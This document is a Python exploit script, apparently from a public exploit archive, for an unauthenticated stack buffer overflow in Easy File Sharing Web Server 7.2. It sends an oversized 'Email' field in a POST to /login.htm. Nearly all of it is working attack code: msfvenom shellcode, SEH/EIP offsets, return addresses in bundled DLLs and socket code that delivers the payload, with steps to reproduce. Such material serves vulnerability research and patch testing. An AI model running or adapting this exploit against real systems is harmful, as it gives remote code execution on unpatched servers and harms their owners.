Easy File Sharing Web Server version 7.2 POST Email unauthenticated remote buffer overflow exploit.
5687d495efb38e1b287888d190b243ab
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: February 7th, 2020
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated,
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed
# POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create
# an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the
# socket directly.
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Change the 'host' variable below to the IP to the target devices IP
# 4) Run this python script
# 5) The program will crash and calculator will open
import socket
host = "192.168.70.134"
port = 80
nops = '\x90'*200
# Bad char = \x00,\x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode
# Payload size: 216 bytes
shellcode = b""
shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f"
shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7"
shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e"
shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60"
shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3"
shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0"
shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03"
shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8"
shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a"
shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa"
shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45"
shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b"
shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2"
shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5"
shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80"
shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f"
shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7"
shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95"
# + ECX & SEH offset @ 3996
offsetECX = '\xcc'*(3996-len(nops+shellcode))
CL = '\x42'
CH = '\x3f'
offsetEIP = '\x43'*8
high2bECX = '\x42\x42'
# EIP overwrite at offset 4008
# - EBX holds PTR to payload in Heap
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)
ret1 = '\x19\x1e\x01\x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret
# - After EIP overwrite ret, ESP is at +16 bytes
offsetRet2 = '\x42'*12
ret2 = '\x5b\x02\xc4\x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2
httpRequest = "POST /login.htm HTTP/1.1\r\n"
httpRequest += "Host: "+host+"\r\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\r\n"
httpRequest += "Accept-Encoding: gzip, deflate\r\n"
httpRequest += "Referer: http://"+host+"/register.ghp\r\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\r\n"
httpRequest += "Connection: close\r\n"
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201\r\n"
httpRequest += "Upgrade-Insecure-Requests: 1\r\n"
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=®ister=Register%21\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((host, port))
print("[+] Successfully connected to "+host)
s.send(httpRequest)
print("[+] Payload Sent")
except:
print("Failure to launch")